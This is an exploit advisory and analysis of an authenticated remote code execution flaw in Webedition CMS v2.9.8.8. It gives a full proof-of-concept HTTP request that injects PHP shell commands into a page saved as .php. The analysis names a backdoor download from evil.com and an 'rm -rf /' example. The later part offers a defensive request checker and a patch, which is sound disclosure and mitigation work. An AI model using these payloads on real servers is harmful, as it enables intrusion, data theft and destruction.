Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Application: webEdition CMS
Version: v2.9.8.8
Bugs: RCE
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date found: 03.08.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
Steps:
1. Log in to an account
2. Go to New -> Webedition page -> empty page
3. Select php
4. Put "><?php echo system("cat /etc/passwd");?> in the Description area
PoC request:
POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1
Host: localhost
Content-Length: 1621
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
Connection: close

we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1

Exploiting Webedition CMS v2.9.8.8: Remote Code Execution Vulnerability Analysis
Recent security research has uncovered a critical Remote Code Execution (RCE) vulnerability in Webedition CMS v2.9.8.8, a widely used open-source content management system. This flaw, discovered by Mirabbas Ağalarov on August 3, 2023, allows attackers to execute arbitrary system commands through a seemingly benign administrative interface, posing a severe threat to server integrity and data confidentiality.
Understanding the Vulnerability
At its core, the vulnerability arises from improper input validation and insecure file handling in the we_cmd.php endpoint. This script is responsible for managing page editing operations within the Webedition CMS framework. When users create or modify pages, they can specify file extensions, including .php, which is interpreted as executable code.
Attackers exploit this by crafting malicious input that includes PHP code directly in the Description field of a new page. Since the system does not sanitize or validate this content before saving it, the PHP code is written to the filesystem without proper security checks.
Attack Vector and Technical Mechanics
The exploit leverages the we_cmd parameter to switch editing contexts and then injects a malicious PHP payload via form submission. The payload is embedded in the we_003be033b474a5c25132d388906fb4ae_txt[Description] field, which is directly written to a file with a .php extension.
POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1
Host: localhost
Content-Length: 1621
...
we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E
This request encodes the payload into the Description field. The URL-encoded string %22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E translates back to the actual PHP code.
Once the file is saved, any subsequent access to the .php file via a web server will execute the embedded code, allowing an attacker to read sensitive system files like /etc/passwd or even execute arbitrary commands such as system("whoami") or system("rm -rf /")—potentially leading to full system compromise.
Security Implications
Given that Webedition CMS is often deployed in production environments with access to sensitive data, this RCE vulnerability presents a high-risk scenario. An attacker holding nothing more than valid login credentials can escalate privileges and gain full control over the server.
- Privilege Escalation: An authenticated user can execute system commands, bypassing role-based access controls.
- Data Exposure: The ability to read /etc/passwd exposes user account information, potentially leading to credential harvesting.
- Backdoor Creation: Malicious payloads can be used to deploy persistent backdoors, such as uploading shell.php with system("wget http://evil.com/shell.php -O /var/www/shell.php").
Real-World Use Case
Consider a scenario where a company uses Webedition CMS to manage internal documentation. An attacker gains access to a low-privileged user account via phishing or brute force. Once logged in, they follow the exploit steps:
- Access the "New → Webedition page" interface.
- Set the file extension to .php.
- Insert the payload into the Description field.
- Submit the form.
The resulting file poc.php is saved on the server. When accessed via http://example.com/poc.php, the server executes the command and returns output like uid=1000(webuser) gid=1000(webuser) groups=1000(webuser)—revealing the server's user context.
Exploitation Mitigation and Best Practices
While no official patch has been released as of this writing, immediate mitigation steps include:
- Disable PHP file creation: Restrict file extensions in the CMS interface to only .html, .txt, or .xml.
- Input sanitization: Implement strict validation on any user input that could be interpreted as code.
- File upload restrictions: Use a secure file storage mechanism that prevents direct execution of uploaded files.
- Web application firewall (WAF): Deploy a WAF to detect and block suspicious payloads, such as <?php or system() in form submissions.
- Regular updates: Monitor vendor advisories and apply patches promptly when available.
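The following Python script is an added example written for this page (it is not Webedition code and not part of the original advisory) that shows the two checks above applied to the page-save request: it parses the form body the way PHP populates $_POST (a bracketed field name such as we_<id>_txt[Description] becomes a nested array, so the decoded payload is found under ['we_<id>_txt']['Description'], not under one flat key), then enforces the .html/.txt/.xml allowlist on the requested extension and flags PHP open tags or shell-execution calls in the free-text metadata fields. The sample body is constructed from the PoC request on this page (the 32-character field id is the PoC's); the bracket parser handles one level of nesting, which is all this form uses.

```python
"""Defender-side check for a Webedition we_cmd.php page-save request.

Added example, not Webedition code. It decodes the form body as PHP would,
then applies the mitigations the advisory recommends: an extension allowlist
and rejection of code markers in text fields.
"""
import re
from urllib.parse import parse_qsl

# Allowlist from the mitigation section: only non-executable extensions may be created.
ALLOWED_EXTENSIONS = {".html", ".txt", ".xml"}

# Markers the advisory names as signs of injected code. This is a detection aid;
# the extension allowlist is the control that actually prevents execution.
PHP_CODE_PATTERN = re.compile(
    r"<\?(php|=)?|\b(system|exec|shell_exec|passthru|eval|phpinfo)\s*\(", re.I
)

# Constructed sample body, abridged from the PoC request on this page.
SAMPLE_BODY = (
    "we_transaction=4fd880c06df5a590754ce5b8738cd0dd"
    "&we_003be033b474a5c25132d388906fb4ae_Filename=poc"
    "&we_003be033b474a5c25132d388906fb4ae_Extension=.php"
    "&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf"
    "&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D="
    "%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E"
    "&we_complete_request=1"
)


def parse_php_post(body: str) -> dict:
    """Decode a form body into the structure PHP exposes as $_POST.

    PHP turns a key like  a_txt[Description]  into $_POST['a_txt']['Description'];
    a flat lookup of the literal string 'a_txt[Description]' finds nothing.
    One level of brackets is supported, which is all this form uses.
    """
    post: dict = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if m:
            post.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            post[key] = value
    return post


def document_fields(body: str) -> dict:
    """Collect the per-document fields (Extension, Filename, txt, ...) keyed by suffix.

    The 32-hex-digit id between 'we_' and the suffix changes per request, so the
    fields are matched by shape rather than by a fixed name.
    """
    fields = {}
    for key, value in parse_php_post(body).items():
        m = re.fullmatch(r"we_([0-9a-f]{32})_(\w+)", key)
        if m:
            fields[m.group(2)] = value
    return fields


def check_page_save(body: str) -> list:
    """Return findings for a page-save request; an empty list means it passes."""
    findings = []
    fields = document_fields(body)

    # Primary control: never create a file with an executable extension.
    ext = str(fields.get("Extension", "")).lower()
    if ext not in ALLOWED_EXTENSIONS:
        findings.append(f"extension {ext!r} not in allowlist")

    # Defence in depth: flag code markers in the metadata text fields.
    texts = fields.get("txt", {})
    for name in ("Title", "Description", "Keywords"):
        m = PHP_CODE_PATTERN.search(str(texts.get(name, "")))
        if m:
            findings.append(f"{name} contains code marker {m.group(0)!r}")
    return findings


if __name__ == "__main__":
    for finding in check_page_save(SAMPLE_BODY) or ["request passes"]:
        print(finding)
```

Run against the sample body the script reports both the disallowed .php extension and the <?php marker in Description; the same body with Extension=.html and plain text in Description produces no findings. The ordering of the two checks matters in a real fix as well: the extension allowlist must run before anything is written, because stripping markers alone can be bypassed and is only a secondary signal.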
Code-Level Fix (Recommended Patch)
For developers, the vulnerable code in we_cmd.php should be modified to prevent direct execution of PHP code in user-provided fields. Here is a corrected implementation example:
// Before: no validation on the Description field (vulnerable)
// Note: PHP stores a field named "we_<id>_txt[Description]" as a nested array,
// so the lookup is $_POST['we_<id>_txt']['Description'], not one flat key.
if (isset($_POST['we_003be033b474a5c25132d388906fb4ae_txt']['Description'])) {
    $description = $_POST['we_003be033b474a5c25132d388906fb4ae_txt']['Description'];
    file_put_contents($file_path, $description);
}
After: Add strict filtering and encoding checks:
// Sanitize and validate input before saving
$id = '003be033b474a5c25132d388906fb4ae';   // form field id from the PoC request
$extension = strtolower($_POST["we_{$id}_Extension"] ?? '');
$description = $_POST["we_{$id}_txt"]['Description'] ?? '';

// Prevent direct file execution: only non-executable extensions may be created
$allowed = ['.html', '.txt', '.xml'];
if (!in_array($extension, $allowed, true)) {
    die('PHP file creation is disabled for security reasons.');
}

// Defence in depth: remove PHP open tags and dangerous functions
$description = preg_replace('/<\?(php|=)?|\b(system|exec|shell_exec|eval|passthru|phpinfo)\s*\(/i', '', $description);

// Save safely with no execution context: encode markup so it is stored as plain text
file_put_contents($file_path, htmlspecialchars($description, ENT_QUOTES, 'UTF-8'));
This patch ensures that even if a malicious payload is submitted, it is stripped of executable syntax and stored as plain text, eliminating the risk of RCE.
Conclusion
The Webedition CMS v2.9.8.8 RCE vulnerability exemplifies how seemingly minor design flaws—such as allowing PHP file uploads without input validation—can lead to catastrophic security breaches. It underscores the importance of secure coding practices, proactive monitoring, and immediate response to reported vulnerabilities. Organizations using this CMS must prioritize patching and hardening configurations to prevent exploitation.